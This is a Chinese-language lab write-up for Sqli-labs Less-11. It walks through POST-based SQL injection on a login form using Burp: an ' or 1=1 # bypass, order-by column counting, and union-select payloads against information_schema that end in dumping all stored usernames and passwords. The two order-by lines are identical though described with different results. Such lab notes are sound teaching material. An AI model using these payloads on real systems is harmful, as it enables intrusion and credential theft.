Sqli-labs-Less-11(笔记)
从第十一关开始就与前面有所不同,在这里需要使用post
首先账户和密码我们输入admin进行登录,显示登录成功,并且有回显。
在这里你会发现使用*http://www.web.com/sql/Less-11/?id=1’ --+*这种格式的并没有用,用为这里是使用post进行传输的,我们需要使用burp来捕获post内容。
打开burp再次使用burp进行登录,会在burp中看到
将它复制到
将uname上的admin删掉输入上’ or 1=1 #(在这里只能使用#号来进行注释),登录成功,说明此处存在注入点。
uname=’ or 1=1 #&passwd=admin&submit=Submit
A or B or是或的意识只要是A或B有一个为真,则返回真
使用order by 查看字段数量
uname=a’ order by 3 #&passwd=admin&submit=Submit 回显错误
uname=a’ order by 3 #&passwd=admin&submit=Submit 回显正确
说明有2列
查看数据库名称以及版本
uname=a’ union select database(),version() #&passwd=admin&submit=Submit
查看所有数据库
使用group_concat()连接
uname=a’ union select 1,group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit
查看所有表
uname=a’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’ #&passwd=admin&submit=Submit
查看users字段
uname=a’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’ #&passwd=admin&submit=Submit
查看username和password,使用concat_ws()函数分割
uname=a’ union select 1,group_concat(concat_ws(’-’,username,password)) from security.users #&passwd=admin&submit=Submit
到此我们就已经拿到所有的用户账号和密码。